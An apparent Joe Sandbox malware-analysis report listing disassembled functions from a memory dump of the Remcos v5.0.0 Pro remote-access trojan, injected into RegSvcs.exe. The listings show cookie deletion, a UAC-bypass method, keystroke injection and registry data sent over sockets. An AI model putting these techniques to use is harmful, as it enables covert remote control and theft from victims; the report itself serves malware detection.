                                    • _free.LIBCMT ref: 004454F4
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: a8f4e868e6027df86e14abe5e970da0ea11d1bbd4f9432e493711607e9b70df4
                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                    • Opcode Fuzzy Hash: a8f4e868e6027df86e14abe5e970da0ea11d1bbd4f9432e493711607e9b70df4
                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                    APIs
                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                    • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                    • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                    • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                    • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID: t^F
                                    • API String ID: 3950776272-389975521
                                    • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                    • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                    • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                    • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690
                                    • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                    • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                    • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    APIs
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                    • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    APIs
                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                    • _free.LIBCMT ref: 00450F48
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00450F53
                                    • _free.LIBCMT ref: 00450F5E
                                    • _free.LIBCMT ref: 00450FB2
                                    • _free.LIBCMT ref: 00450FBD
                                    • _free.LIBCMT ref: 00450FC8
                                    • _free.LIBCMT ref: 00450FD3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-3294358829
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • UserProfile, xrefs: 0040BAAD
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                    • API String ID: 2425139147-2278869229
                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    APIs
